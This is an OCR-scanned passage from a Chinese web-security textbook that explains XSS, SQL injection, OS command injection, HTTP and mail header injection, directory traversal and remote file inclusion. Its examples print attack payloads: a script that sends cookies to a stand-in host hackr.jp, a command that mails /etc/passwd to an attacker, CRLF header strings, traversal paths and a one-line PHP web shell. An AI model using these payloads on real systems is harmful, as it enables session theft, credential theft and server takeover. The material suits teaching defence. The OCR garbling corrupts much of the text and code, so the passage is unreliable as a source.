引用 户 的 浏览 器 触发 事先 已 设 好 
陷阱 的 HTTP 请 求 2 
[一 .6 一 
人 陷阱 诱导 兴 玛 
攻击 者 
图 : 被 动 攻击 


利用 用 户 的 吴 份 攻击 企业 内 部 网 络 


利用 被 动 攻击 ， 可 发 起 对 原本 从 互联 网 上 无 法 直接 访问 的 企业 内 
网 等 网 络 的 攻击 。 只 要 用 户 踏 入 攻击 者 预先 设 好 的 陷阱 ， 在 用 户 
能 够 访问 到 的 网 络 范 围 内 ， 即 使 是 企业 内 网 也 同样 会 受到 攻击 。 


很 多 企业 内 网 依然 可 以 连接 到 互联 网 上 ， 访 问 Web 网 站 ， 或 接 


收 互联 网 故 来 的 邮件 。 这 样 束 可 能 给 攻击 者 以 可 乘 之 机 ， 诱 导 用 
户 触 发 陷阱 后 对 企业 内 网 发 动 攻击 。 


201 


利用 用 户 身份 的 攻击 





TS 
3 企业 内 网 用 户 的 浏览 器 运行 一 
攻击 代码 EE 一 5 = 





(用户 的 浏览 器 触发 事先 已 设 好 陷阱 的 
HTTP 请 求 





a 
图 ， 利 用 被 动 攻击 对 企业 内 网 发 动 攻击 

11.2 因 输 出 值 转 义 不 完全 引 及 的 安全 漏 泣 

实施 Web 应 用 的 安全 对 策 可 大 臻 分 为 以 下 两 部 分 。 

。 客 户 端的 验证 


。 Web 应 用 端 ( 服 务 器 端 ) 的 验证 
o 输入 值 验证 





有 陷阱 诱导 企业 内 网 的 Web 服务 器 











o 输出 值 转 义 
HTTP 响 应 ”时 
> 
输 处 输 访问 DB 本 2 


HTTP 请 求 


访问 文件 文件 
系统 


客户 端的 验证 Web 应 用 端的 验证 
图 : 验证 数据 的 几 个 地 方 
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多 数 情况 下 采用 JavaScript 在 客户 端 验证 数据 。 可 是 在 客户 端 允 许 算 
改 数据 或 关闭 JavaScript， 不 适合 将 JavaScript 验证 作为 安全 的 防范 
对 策 。 保 留 客户 端 验证 只 是 为 了 尽早 地 辨识 输入 错误 ， 起 到 提高 UI 
体验 的 作用 。 


Web 应 用 端的 输入 值 验证 按 Web 应 用 内 的 处 理 则 有 可 能 被 误 认 为 是 
具有 攻击 性 意义 的 代码 。 输 入 值 验证 通常 是 指 检查 是 人 否 是 符合 系统 业 
务 人 逻辑 的 数值 或 检查 字符 编码 等 预防 对 集 。 


从 数据 库 或 文件 系统 、HTML、 邮 件 等 输出 Web 应 用 处 理 的 数据 之 
际 ， 针 对 输出 做 值 转 义 处 理 是 一 项 至 关 重 要 的 安全 策略 。 当 输出 值 转 
人 























11.2.1 跨 站 脚本 攻击 

跨 站 脚本 攻击 (Cross-Site Scripting，XSS) 是 指 通过 存在 安全 漏洞 的 
Web 网 站 注册 用 户 的 浏览 器 内 运行 非法 的 HTML 标签 或 JavaScript 进 
行 的 一 种 攻击 。 动 态 创建 的 HTML 部 分 有 可 能 隐藏 着 安全 漏洞 。 就 
这 样 ， 攻 击 者 编写 脚本 设 下 陷阱 ， 用 户 在 自己 的 浏览 器 上 运行 时 ， 一 
不 小 心 就 会 受到 被 动 攻击 。 

跨 站 脚本 攻击 有 可 能 造成 以 下 影响 。 

。 利 用 虚假 输入 表单 骗取 用 户 个 人 信息 。 


。 利 用 脚本 急 取 用 户 的 Cookie 值 ， 被 害 者 在 不 知情 的 情况 下 ， 
帮助 攻击 者 发 送 恶 意 请 求 。 


。 显示 伪造 的 文章 或 图 片 。 











e。 跨 站 脚本 攻击 案例 
在 动态 生成 HTML 处 发 生 


下 面 以 编辑 个 人 信息 页 面 为 例 讲 解 路 站 脚本 攻击 。 下 方 界面 显示 
了 用 户 输 入 的 个 人 信息 内 容 。 
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| 
编辑 个 人 信息 编辑 个 人 信息 
姓名 | 山口 一 郎 | 姓名 山口 一 郎 
邮箱 地 址 yama@example.com | 邮箱 地 址 yama@example.com 

















自我 介绍 | 你 好 ! 自我 介绍 ”你 好 ! 
确认 修改 保存 修改 











动态 生成 HTML 处 有 可 能 隐 含 安全 漏洞 
图 : 解 路 站 脚本 攻击 案例 


确认 界面 按 原样 显示 在 编辑 界面 输入 的 字符 串 。 此 处 输入 带 有 山 
口 一 郎 这 样 的 HTML 标签 的 字符 串 。 








输入 HTML 标签 <s> 山口 一 郎 </s> 经 浏览 器 解析 
标 和 





<s> 山 口 一 郎 </s> | 
邮箱 地 址 lyama@example.com| 
自我 介绍 | 你 好 ! | 自我 介绍 “你 好 ! 


确认 修改 | 保存 修改 | 




















图 : 按照 输入 内 容 原 样 显示 的 机 制 


此 时 的 确认 界面 上 ， 浏 览 器 会 把 用 户 输 入 的 <s> 解析 成 HTML 
标签 ， 然 后 显示 删除 线 。 


删除 线 显示 出 来 并 不 会 造成 太 大 的 不 利 后 果 ， 但 如 果 换 成 使 用 
script 标签 将 会 如 何 呢 。 


XSS 是 攻击 者 利用 预先 设置 的 陷阱 触及 的 被 动 攻击 


跨 站 脚本 攻击 属于 被 动 攻 击 模式 ， 因 此 攻击 者 会 事先 布置 好 用 于 
攻击 的 陷阱 。 


下 图 网 站 通过 地 址 栏 中 URI 的 查询 字段 指定 ID， 即 相当 于 在 表 
单 内 自动 填写 字符 串 的 功能 。 而 就 在 这 个 地 方 ， 隐 藏 着 可 执行 跨 
站 脚本 攻击 的 漏洞 。 
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http:wexample.jpllogin?ID=yama 
== 


人 铬 办 省 Nu 是 


E! 拍卖 会 


ID | yama 
PYY 

































充分 熟知 此 处 漏洞 特点 的 攻击 者 ， 于 是 束 创 建 了 下 面 这 段 供 入 恶 
意 代 码 的 URL。 并 隐藏 植 入 事先 准备 好 的 欺诈 邮件 中 或 Web 页 
面 内 ， 诱 使 用 户 去 点击 该 URL。 








http://example.jp/login?ID="><script>vart+f=document .getElementById("1dq 


浏览 器 打开 该 URI 后， 直观 感觉 没有 发 生 任 何 变 化 ， 但 设置 好 的 
脚本 却 偷 偷 开始 运行 了。 当 用 户 在 表单 内 输入 ID 和 密码 之 后 ， 

就 会 直接 发 送 到 攻击 者 的 网 站 《〈 也 就 是 hackrjp) ， 导 致 个 人 登 
录 信 息 航 禄 取 。 


http:/example.jpllogin?1D="><Scr.. 








表面 上 没有 变化 但 脚 


本 已 运行 


表单 填写 完毕 后 就 直 
接 把 ID 及 密码 发 送 到 
攻击 者 的 网 站 











之 后 ，ID 及 密码 会 传 给 该 正规 网 站 ， 而 接 下 来 仍然 是 按 正 常 登 
录 步 又， 用 户 很 难 意识 到 上 自己 的 登录 信息 已 站 泄露 。 


对 http://example.jp/login?ID=yama 请 求 时 对 应 的 HTML 
源 代码 (摘录 ) 








<div class="logo"> 
<img src="/img/logo.gif" alt="E! 拍卖 会 " /> 




















</div> 
<form action="http://example.jp/login" method="post" id="login"> 
<div class="input id"> 
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ID <input type="text" name="ID" value="yama" /> 
</div> 





http://example.jp/login?ID="> 
<script>var+f=document.getElementById("login");+f 
</script><span+s=" 对 请 求 时 对 应 的 HTMIL 源 代码 (摘录 ) 


<div class="]ogo"> 

<img src="/img/logo.gif" alt="E! 
</div> 
<form action="http://example.jp/login" method="post" id="login"> 
<div class="input id"> 

ID <input type="text" name="ID" value=""><script>var f=document .getH 
</div> 


























。 对 用 户 Cookie 的 窃取 攻击 


除了 在 表单 中 设 下 圈套 之 外 ， 下 面 那 种 恶意 构造 的 脚本 同样 能 够 
以 路 站 脚本 攻击 的 方式 ， 禄 取 到 用 户 的 Cookie 信息 。 


<Script src=http://hackr.jp/xss.js></script> 


该 脚本 内 指定 的 http://hackr.jp/xssjs 文件 。 即 下 面 这 段 采 用 
JavaScript 编写 的 代码。 





var content = escape(document.cookie); 
document .write("<img src=http://hackr.jp/?"); 


document .write(content); 
document .write(">"); 








在 存在 可 跨 站 脚本 攻击 安全 漏洞 的 Web 应 用 上 执行 上 面 这 段 
JavaScript 程序 ， 即 可 访问 到 该 Web 应 用 所 处 域名 下 的 Cookie 信 
息 。 然 后 这 些 信息 会 发 送 至 攻击 者 的 Web 网 站 

《http://hackr.jp/〉”， 记 录 在 他 的 登录 日 志 中 。 结 果 ， 攻 击 者 就 这 
样 鳃 取 到 用 户 的 Cookie 信息 了 。 
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http://fexample.jp/login?lD="»><script 
src=http:/#/hackr. jp/xss.js></script>" 























[od) 
二 路 盘 
E! 拍卖 会 
| ID 脚本 一 运行 ， 正在 浏 
览 该 Web 网 站 的 用 户 
PW Cookie 就 会 被 窃取 














图 : 使 用 XSS 攻击 和 夺取 Cookie 信息 
11.2.2 SQL 注入 攻击 
。 会 执行 非法 SQL 的 SQL 注 入 攻击 

SQL 注入 〈SQL Injection) 是 指针 对 Web 应 用 使 用 的 数据 库 ， 通 
过 运行 非法 的 SQL 而 产生 的 攻击 。 该 安全 隐患 有 可 能 引发 极 大 
的 威胁 ， 有 时 会 直接 导致 个 人 信息 及 机 密 信息 的 泄露 。 
Web 应 用 通常 都 会 用 到 数据 库 ， 当 需要 对 数据 库 表 内 的 数据 进行 
检索 或 添加 、 删 除 等 操作 时 ， 会 使 用 SQL 语句 连接 数据 库 进 行 
特定 的 操作 。 如 果 在 调用 SQL 语 句 的 方式 上 存在 下 漏 ， 就 有 可 
能 执行 被 恶意 注入 〈Injection) 非法 SQL 语句 。 
SQL 注 入 攻击 有 可 能 会 造成 以 下 等 影响 。 

o 非法 查看 或 自 改 数据 库 内 的 数据 

o 规避 认证 

o 执行 和 数据 库 服 务 器 业务 关联 的 程序 等 
何 为 SQL 
SQL 是 用 来 操作 关系 型 数据 库 管 理 系统 (Relational DataBase 
Management System，RDBMS) 的 数据 库 语 言 ， 可 进行 操作 数据 
或 定义 数据 等 。RDBMS 中 有 名 的 数据 库 有 Oracle Database、 
Microsoft SQL Server、IBM DB2、MySQL 和 PostgreSQL 等 。 这 
些 数 据 库 系 统 都 可 以 把 SQL 作为 数据 库 语 言 使 用 。 


使 用 数据 库 的 Web 应 用 ， 通 过 茶 种 方法 将 SQL 语句 传 给 
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RDBMS， 再 把 RDBMS 返回 的 结果 灵活 地 使 用 在 Web 应 用 中 。 

o SQL 语句 示例 

。 SQL 注入 攻击 案例 
下 面 以 某 个 购物 网 站 的 搜索 功能 为 例 ， 讲 解 SQL 注入 攻击 。 通 


过 该 功能 ， 我 们 可 以 将 茶 作 者 的 名 字 作 为 搜索 关键 字 ， 碍 找 该 作 
者 的 所 有 著作 。 





和 中 重 六 


BOOKSTORE 
作者 上野 宣 ” 的 搜索 结果 

ee i 
12/06/19 ” 上野 宣 ”繁杂 的 Web 安 作 一 览 
05/06/17 上野 宣 ” 今 晚 我 们 一 起 学 习 邮件 协 …… 

04/12/09 ”上野 宣 ” 今 晚 我 们 一 起 学 习 HTTP * 不 显示 已 绝版 的 
04/12/09 ” 上野 宣 ” 今 晚 我 们 一 起 学 习 TCP/IP 书籍 













图 : SQL 注 入 攻击 案例 
正常 处 理 的 操作 示例 
下 图 是 将 “上 野 宣 ”作为 关键 字 的 搜索 结果 。 
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CE 
和 中 重 一 >— 大 
BOOKSTORE 
作者 "上野 宣 的 搜索 结果 | http:/example.com/search?q= 上 对 宣 


12/06/19 上 野 宣 繁杂 的 Web 安 …… 
05/06/17 上 紧 宣 今 晚 我 们 一 起 学 习 邮 件 协 …… 





一 一 主 


0 i 






【 SQL 语句 】 
SELECT* FROM bookTbl WHERE author = ' 上 对 宣 ' andflag = 1; 


从 bookTbl 表 中 ， 显示 满足 author= 上 对 宣 and flag=1{ 可 售 ) 所 在 行 的 数据 


图 : 正常 处 理 操作 的 示例 


URL 的 查询 字段 已 指定 q9= 上 野 宣 ， 这 个 值 由 Web 应 用 传 入 到 
SQL 语句 中 ， 构 成 下 方 的 SQL 语句 。 


SELECT * FROM bookTb1 WHERE author = "上野 宣 ' and flag = 





该 SQL 语句 表示 “从 bookTbl 表 中 ， 显 示 满 足 author= 上 野 宣 and 
flas=1〈 可 售 ) 所 在 行 的 数据 ”。 


数据 库 内 的 bookTbl 表 记 录 着 该 购物 网 站 的 所 有 书籍 信息 。 通 过 
SQL 语 句 ， 将 满足 作者 名 (author) 上 野 宣 并 且 flag 为 1 双重 条 
件 的 条 目 取 出 ， 最 后 作为 搜索 结果 显示 出 来 。 





bookTbl 


1000203503 ”12/06/2023 ”新 并 悠 Bug 猪 人 日 记 1 
: 1000203501 12/06/2019 上 对 宣 繁杂 的 Web 安 全 性 1 
1000103409 ”10/06/2002 ”明智 光秀 ”本 能 寺 之 变 0 
1 
1 









1000093050 ”05/06/2017 上层 宣 今 晚 我 们 一 起 学 习 邮 件 协议 
1000085771 04/12/2009 上 对 宣 _ 今 晚 我 们 一 起 学 习 HTTP 
1000072889 ”04/12/2009 上 枝 宣 。 今 晚 我 们 一 起 学 习 TCP/IP 1 
1000042384 ”03/04/2021 ”上 层 宣 ”新 手 必 备 TCP/IP 入 门 0 






从 bookTbl 表 内 显示 满足 "author= 上 野 宣 ” 且 “flag=1” 条件 的 所 在 行 数据 
*“flag=0” 代表 绝版 的 书籍 
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图 : 数据 库 处 理 

SQL 注入 攻击 的 操作 示例 

把 刚才 指定 查询 字段 的 上 野 宣 改写 成 “上野 宣 '-”。 
BOOKSTORE 


作者 "上野 宣 ” 的 搜索 结果 | http://example.comy/search?q= 上野 宣 ' -- 


12/06/19 上 野 宣 繁杂 的 Web 安 …… 
05/06/17 上 野 宣 今 晚 我 们 一 起 学 习 邮 件 协 …… 
04/12/09 上 野 宣 今 晚 我 们 一 起 学 习 HTTP 








la 
和 路 得 ~ 




















【 SQL 语句 
SELECT * FROM bookTbl WHERE author =' 上 又 宣 ' --' 






and flag = 1; 





从 bookTbl 表 内 显示 满足 “author= 上 枝 宣 "这 个 条 件 的 所 在 行 数据 


{ -- 之 后 的 内 容 会 自动 判 为 注释 ， 因 此 flag=1 这 个 条 件 就 被 直接 忽略 了 ) 





图 : SQL 注入 攻击 的 操作 示例 


构成 的 SQL 语句 就 变 成 “从 数据 库 的 bookTbl 表 中 ， 显 示 满 足 
author= 上 野 宣 条 件 所 在 行 的 数据 ”， 如 下 所 示 。 


SELECT * FROM bookTbl WHERE _ author =' 上野 宣 ' - -' and fl 


SQL 语句 中 的 -- 之 后 全 视 为 注释 。 即 ，and flag=1 这 个 条 件 被 自 
动 忽略 了 。 
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bookTbl 


bd date ao |ite fog 
1000203503 12/06/2023 新 井 悠 Bug 猪 人 日 记 1 


1000203501 ”12/06/2019 上野 宣 ”繁杂 的 Web 安全 性 1 
1000103409 ”10/06/2002 ”明智 光秀 ”本 能 寺 之 变 0 
1 
1 


1000093050 05/06/2017 上野 宣 今 晚 我 们 一 起 学 习 邮 件 协 议 


1000085771 04/12/2009 ”上 对 宣 今 晚 我 们 一 起 学 习 HTTP : 


1000072889 ”04/12/2009 ” 上层 宣 。 今 晚 我 们 一 起 学 习 TCP/IP 


1000042384 03/04/2021 ”上层 宣 ”新 手 必 备 TCP/IP 入 门 


原本 不 会 显示 的 行 


从 bookTbl 表 内 显示 满足 "author= 上野 宣 " 这 个 条 件 的 所 在 行 数据 
















{ flag 这 个 筛选 条 件 因 SQL 注 入 变 成 无 效 的 了 } 


图 : 数据 库 处 理 


结果 跟 flag 的 设 定 值 无 关 ， 只 取出 满足 author=“ 上野 宣 ” 条 件 所 
在 行 的 数据 ， 这 样 连 那些 尚未 出 版 的 书籍 也 一 并 显示 出 来 了 。 





[LE 
和 路 重心 
BOOKSTORE 


作者 "上 野 宣 '… 的 搜索 结果 


12/06/2019 ”上 野 宣 1 Web.……… 

05/06/2017 上野 宣 ” 今 晚 我 们 一 起 学 习 邮 件 协 …… 

04/12/2009 上野 宣 今 晚 我 们 一 起 学 习 HTTP 

04/12/2009 上野 宣 今 晚 我 们 一 起 学 习 TCP/IP 原本 不 该 显示 


03/04/2021 上野 宣 ”新 手 必 备 ……. 的 绝版 的 数据 
却 显示 了 










图 : 被 SQL 注 入 的 后 果 
。SQL 注入 攻击 破坏 SQL 语句 结构 的 案例 


SQL 注 入 是 攻击 者 将 SQL 语 句 改变 成 开发 者 意 想 不 到 的 形式 以 
达到 破坏 结构 的 攻击 。 


比如 ， 在 之 前 的 攻击 案例 中 ， 就 会 把 author 的 字面 值 〈 程 序 中 使 
用 的 常量 ) " 上 野 宣 '--" 的 字符 串 赋 值 给 $q。 
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SELECT * FROM bookTbl WHERE author = '$q' and flag = 1; 


| 


SELECT * FROM bookTb] WHERE author =| 工 上 枝 宣 | ' and flag = 1; 





| 


author 的 字面 值 浇 出 


图 : SQL 注入 攻击 的 原理 


上 图 中 颜色 标记 的 字符 串 最 开始 的 单 引 号 () 表示 会 将 author 的 
字面 值 括 起 来 ， 以 到 达 第 二 个 单 引 号 后 作为 结束 。 因 此 ，author 
的 字面 值 束 成 了 上 对 宣 ， 而 后 面 的 -- 则 不 再 属于 author 字面 
值 ， 会 被 解析 成 其 他 的 句法 。 


本 案例 中 的 问题 仪 仅 是 把 未 出 版 书籍 的 条 目 也 一 同 显 示 出 来 了 。 

但 实际 发 生 SQL 注入 攻击 时 ， 很 有 可 能 会 导致 用 户 信息 或 结算 

ee 从 而 使 用 户 遭 受 不 同 程度 
六 








11.2.3 ”OS 命令 注入 攻击 

OS 命令 注入 攻击 (OS Command Injection〉 是 指 通过 Web 应 用 ， 执 行 
非法 的 操作 系统 命令 达到 攻击 的 目的 。 只 要 在 能 调用 Shell 函数 的 地 
方 就 有 存在 被 攻击 的 风险 。 


可 以 从 Web 应 用 中 通过 Shell 来 调用 操作 系统 命令 。 们 条 调用 Shell 





时 存在 疏 漏 ， 就 可 以 执行 插入 的 非法 OS 命令 。 

OS 命令 注入 攻击 可 以 向 Shell 发 送 命令 ， 让 Windows 或 Linux 操作 系 
统 的 命令 行 启 动 程 序 。 也 就 是 说 ， 通 过 OS 注入 攻击 可 执行 OS 上 安 
装着 的 各 种 程序 。 





。OS 注入 攻击 案例 


下 面 以 咨询 表单 的 发 送 功能 为 例 ， 讲 解 OS 注入 攻击 。 该 功能 可 
将 用 户 的 咨询 邮件 按 已 填写 的 对 方 邮箱 地 址 发 送 过 去 。 
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[3 

角 趾 省 nu 

M4 咨询 

请 在 下 方 表单 内 输入 内 容 后 发 送 
邮件 地 址 














咨询 内 容 























图 : OS 注入 攻击 的 攻击 案例 
下 面 摘 选 处 理 该 表单 内 容 的 一 部 分 核心 代码 。 


my $adr = $q->param( 'mailaddress ' ) ; 


open(MAIL, "| /usr/sbin/sendmail $adr"); 
print MAIL "From: info@Qexample.com\n"; 





程序 中 的 open 函数 会 调用 sendmail 命令 发 送 邮件 ， 而 指定 的 邮 
件 发 送 地 址 即 $adr 的 值 。 


攻击 者 将 下 面 的 值 指定 作为 邮件 地 址 。 


; cat /etc/passwd | mail hack@example.jp 
程序 接收 该 值 ， 构 成 以 下 的 命令 组 合 。 


| /usr/sbin/sendmail ; cat /etc/passwd | mail hack@example.jp 


攻击 者 的 输入 值 中 含有 分 号 〈(;) 。 这 个 符号 在 OS 命令 中 ， 会 被 
解析 为 分 隔 多 个 执行 命令 的 标记 。 

可 见 ，sendmail 命令 执行 被 分 隔 后 ， 接 下 去 就 会 执行 cat 
/etc/passwd | mail hack@example.jp 这 样 的 命令 了 。 结 果 ， 含 有 
Linux 账户 信息 /etc/passwd 的 文件 ， 束 以 邮件 形式 发 送 给 了 
hack(Wexample.jp。 


11.2.4 。 HTTP 首部 注入 攻击 


HTTP 首部 注入 攻击 (HTTP Header Injection〉 是 指 攻 击 者 通过 在 响应 
首部 字段 内 插入 换行 ， 添 加 任意 响应 首部 或 主体 的 一 种 攻击 。 属 于 被 
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动 攻 击 模式 。 


向 首部 主体 内 添加 内 容 的 攻击 称 为 HTTP 响应 截断 攻击 (HTTP 
Response Splitting Attack) 。 


如 下 所 示 ，Web 应 用 有 时 会 把 从 外 部 接收 到 的 数值 ， 贱 给 啊 应 首部 字 
段 Location 和 Set-Cookie。 


Location: http://www.example.com/a.cgi?q=12345 
Set-Cookie: UID=12345 





火 12345 束 是 插入 值 





HTTP 首部 注入 可 能 像 这 样 ， 通 过 在 茶 些 啊 应 首部 字段 需要 处 理 输出 
值 的 地 方 ， 插 入 换行 发 动 攻击 。 


HTTP 首部 注入 攻击 有 可 能 会 造成 以 下 一 些 影响 。 


。 设置 任何 Cookie 信息 





。 重 定向 至 任意 URL 
。 显 示 任 意 的 主体 (HTTP 响应 截断 攻击 ) 


。HTTP 首部 注入 攻击 案例 


下 面 我 们 以 选 定 某 个 类 别 后 即 可 跳 转 至 各 类 别 对 应 页 面 的 功能 大 
例 ， 讲 解 HTTP 首部 注入 攻击 。 该 功能 为 每 个 类 别 都 设 定 了 一 个 
类 别 了 D 值 ， 一 旦 选 定 某 类 别 ， 束 会 将 该 D 值 反映 在 响应 内 的 
Location 首部 字段 内 ， 形 如 Location: http://example.cony? 

ca 人 f=101。 令 浏览 器 发 生 重 定 向 跳 转 。 
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重 定向 至 选 定 类 别 所 在 页 面 的 功能 

















响应 首部 | 


Location: http:/{fexample.com/?cat=101 
图 :HTTP 首部 注入 攻击 示例 
攻击 者 以 下 面 的 内 容 蔡 代 之 前 的 类 别 DD 后 发 送 请 求 。 





101%0D%S0ASet-Cookie:+SID=123456789 





其 中 ，%0D%0A 代表 HTTP 报 文中 的 换行 符 ， 紧 接着 的 是 可 强 
制 将 攻击 者 网 站 (http:/hackrjp/) 的 会 话 ID 设置 成 
SID=123456789 的 Set-Cookie 首部 字段 。 


发 送 该 请 求 之 后 ， 假 设 结果 返回 以 下 啊 应 。 


Location: http://example.com/?cat=161 (%6D%6A : 换行 符 ) 


Set-Cookie: SID=123456789 





此 刻 ， 首 部 字段 Set-Cookie 已 生效 ， 因 此 攻击 者 可 指定 修改 任意 
的 Cookie 信息 。 通 过 和 会 话 固定 攻击 《攻击 者 可 使 用 指定 的 会 
话 了 P) 攻击 组 合 ， 攻 击 者 可 伪装 成 用 户 。 


攻击 者 输入 的 %0D%0A， 原 本 应 该 属于 首部 字段 Location 的 查 
询 值 部 分 ， 但 经 过 解析 后 ，%0D%0A 变 成 了 换行 符 ， 结 果 插 入 
了 新 的 首部 字段 。 

这 样 一 来 ， 攻 击 者 可 在 响应 中 插入 任意 的 首部 字段 。 


e。HTTP 响应 截断 攻击 
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HTTP 响应 截断 攻击 是 用 在 HTTP 首部 注入 的 一 种 攻击 。 攻 击 顺 
序 相 同 ， 但 是 要 将 两 个 %0D%0A%0D%0A 并 排 插 入 字符 串 后 发 
送 。 利 用 这 两 个 连续 的 换行 就 可 作出 HTTP 首部 与 主体 分 隔 所 需 
的 空 行 了 ， 这 样 就 能 显示 伪造 的 主体 ， 达 到 攻击 目的 。 这 样 的 攻 
击 叫做 HITP 响应 截断 攻击 。 





%6D%6A%6DX%6A<HTML><HEAD><TITLE> 之 后 ， 想 要 显示 的 网 页 内 容 <! 





在 可 能 进行 HTTP 首部 注入 的 环节 ， 通 过 发 送 上 面 的 字符 串 ， 返 
回 结果 得 到 以 下 这 种 啊 应 。 


Set-Cookie: UID= (%eD%6A : 换行 符 ) 
(%e@D%e@A : 换行 符 ) 





<HTML><HEAD><TITLE> 之 后 ， 想 要 显示 的 网 页 内 容 <!-- (原来 页 面 Xx 





利用 这 个 攻击 ， 已 触发 陷阱 的 用 尸 浏览 器 会 显示 伪造 的 Web 页 
人 目 己 的 个 人 信息 等 ， 可 达到 和 路 站 脚本 攻击 相 
同 的 效 末 。 


另外 ， 小 用 HTTP/1.1 中 汇集 多 啊 应 返回 功能 ， 会 导致 缓存 服务 
器 对 任意 内 容 进行 缓存 操作 。 这 种 攻击 称 为 缓存 污染 。 使 用 该 组 
存 服务 器 的 用 户 ， 在 浏览 遭受 攻击 的 网 站 时 ， 会 不 断 地 浏览 被 蔡 
换 掉 的 Web 网 页 。 


11.2.$S 邮件 首部 注入 攻击 


邮件 首部 注入 〈Mail Header Injection) 是 指 Web 应 用 中 的 邮件 发 送 功 
能 ， 攻 击 者 通过 向 邮件 首部 To 或 Subject 内 任意 添加 非法 内 容 发 起 的 
攻击 。 利 用 存在 安全 漏洞 的 Web 网 站 ， 可 对 任意 邮件 地 址 发 送 广 告 
邮件 或 病毒 邮件 。 


。 邮 件 首部 注入 攻击 采 例 
下 面 以 Web 页 面 中 的 咨询 表单 为 例 讲解 邮件 首部 注入 攻击 。 该 


功能 可 在 表单 内 填 入 咨询 者 的 邮件 地 址 及 咨询 内 容 后 ， 以 邮件 的 
形式 发 送 给 网 站 管理 员 。 
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和 和 中 委 so 

M4 咨询 

请 填写 以 下 表单 后 发 送 。 
邮件 地 址 











咨询 内 容 | 























图 : 邮件 首部 注入 攻击 案例 
攻击 者 将 以 下 数据 作为 邮件 地 址 发 起 请 求 。 


boblhackr .jp%0D%S0ABcc: userlexample.com 


%0D%0A 在 邮件 报 文中 代表 换行 符 。 一 旦 咨询 表单 所 在 的 Web 
应 用 接收 了 这 个 换行 符 ， 束 可 能 实现 对 Bcce 邮件 地 址 的 退 加 友 
送 ， 而 这 原本 是 无 法 指定 的 。 


另外 像 下 面 一 样 ， 使 用 两 个 连续 的 换行 符 就 有 可 能 算 改 邮件 文本 
内 容 并 发 送 。 


再 以 相同 的 方法 ， 就 有 可 能 改写 To 和 Subject 等 任意 邮件 首部 ， 
或 问 文本 添加 附件 等 动作 。 


11.2.6 ”目录 过 历 攻 击 


目录 遍历 〈Directory Traversal ) 攻击 是 指 对 本 无 意 公 开 的 文件 目录 ， 
通过 非法 截断 其 目录 路 径 后 ， 达 成 访问 目的 的 一 种 攻击 。 这 种 攻击 有 
时 也 称 为 路 径 裔 历 (Path Traversal) 攻击 。 


通过 Web 应 用 对 文件 处 理 操 作 时 ， 在 由 外 部 指定 文件 名 的 处 理 存 在 
琉 漏 的 情况 下 ， 用 户 可 使 用 .../ 等 相对 路 径 定 位 到 /etc/passed 等 绝对 
路 径 上 ， 因 此 服务 器 上 任意 的 文件 或 文件 目录 和 矣 有 可 能 被 访问 到 。 这 
样 一 来 ， 就 有 可 能 非法 浏览 、 算 改 或 删除 Web 服务 器 上 的 文件 。 


ne 
又 限 。 
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。 目 录 遍 历 攻 击 案例 


下 面 以 显示 读 取 文 件 功能 为 例 ， 讲 解 目 录 裔 历 攻 击 。 该 功能 通过 
以 下 但 询 字 段 ， 指 定 某 个 文件 名 。 然 后 从 /www/log/ 文件 目录 下 
读 取 这 个 指定 的 文件 。 


http://example.com/read.php?10g=0401 .1og 


攻击 者 设置 如 下 查询 字段 后 发 出 请 求 。 


http://example.com/read.php?10g=../../etc/passwd 


查询 字段 为 了 读 取 攻击 者 盯 上 的 /etc/passwd 文件 ， 会 从 
/wwwl/log/ 目录 开始 定位 相对 路 径 。 如 果 这 份 read.php 脚本 接受 
人 目录 的 访问 请 求 处 理 ， 那 原本 不 公开 的 文件 就 存在 可 被 访 
问 的 风险 。 





log=../../etc/passwwd 







log=0401.log 


0401.log 
pe 








图 : 目录 遍历 攻击 案例 
11.2.7 远程 文件 包含 漏洞 
远程 文件 包含 漏洞 (Remote File Inclusion) 是 指 当 部 分 脚本 内 容 需要 
从 其 他 文件 读 入 时 ， 攻 击 者 利用 指定 外 部 服务 器 的 URL 充当 依赖 文 
件 ， 让 脚本 读 取 之 后 ， 束 可 运行 任意 脚本 的 一 种 攻击 。 
这 主要 是 PHP 存在 的 安全 漏洞 ， 对 PHP 的 include 或 require 来 说 ， 
这 是 一 种 可 通过 设 定 ， 指 定 外 部 服务 器 的 URL 作为 文件 名 的 功能 。 
但 是 ， 该 功能 太 危 险 ，PHP5.2.0 之 后 默认 设 定 此 功能 无 效 。 


回 然 存 在 输出 值 转 义 的 问题 ， 但 更 应 控制 对 任意 文件 名 的 指定 。 
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远程 文件 包含 漏洞 的 攻击 案例 
下 面 以 include 读 入 由 查询 字段 指定 文件 的 功能 为 例 ， 讲 解 远 程 
文件 包含 漏洞 。 该 功能 可 通过 以 下 查询 字段 形式 指定 文件 名 ， 并 
在 脚本 内 的 include 语句 处 读 入 这 个 指定 文件 。 
对 应 脚本 的 源 代码 如 下 所 示 。 

http://example.com/foo.php 的 源 代码 (部 分 摘录 ) 


$modname = $ GET['mod']; 
include($modname ) ; 


攻击 者 指定 如 同 下 面 形 式 的 URL 发 出 请 求 。 





http://example.com/foo.php?mod=http://hackr.jp/cmd.phpgcmd=1s 





攻击 者 已 事先 在 外 部 服务 器 上 准备 了 以 下 这 上 段 脚 本 。 


http://hackr.jp/cmd.php 的 源 代码 


<? system($ GET['cmd']) ?> 


假设 Web 服务 器 (example.com) 的 include 可 以 引入 外 部 服务 器 
的 URL， 那 就 会 读 入 攻击 者 在 外 部 服务 器 上 事先 准备 的 

URL (http://hackr.jp/cmd.php〉 。 结 果 ， 通 过 system 函数 就 能 在 
Web 服务 器 (example.com) 上 执行 查询 字段 指定 的 OS 命令 了 。 
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http:/fexample.com/foo.php?mod=news.php 


读 入 同一 目录 下 的 文件 并 执行 
$modname = $_GETI['mod']; 
re includet$modname): 











攻击 实例 
http://fexample.com/foo.php?mod=http://hackr.jpicmd.php&cmd=|s 
读 入 外 部 服务 器 上 的 脚本 并 执行 


【 http:/hackrjpycmd.php 的 源 代码 】 
<? system({$_GET['cmd'])}) ?> 
通过 system 函数 就 能 够 在 example.com 服务器 上 执行 OS 命令 


图 : 远程 文件 包含 漏洞 的 攻击 案例 


在 以 上 攻击 案例 中 ， 执行 了 可 显 不 Web 服务 器 (example.com) 
上 文件 及 目录 信息 的 1s 命令 。 


11.3” 因 设置 或 设计 上 的 缺陷 引发 的 安全 漏 
洞 


因 设 置 或 设计 上 的 缺陷 引发 的 安全 漏洞 是 指 ， 错 误 设 置 Web 服务 
医 ， 或 是 由 设计 上 的 一 些 问题 引起 的 安全 漏洞 。 


11.3.1 强制 浏览 


强制 浏览 〈Forced Browsing) 安全 漏洞 是 指 ， 从 安置 在 Web 服务 器 
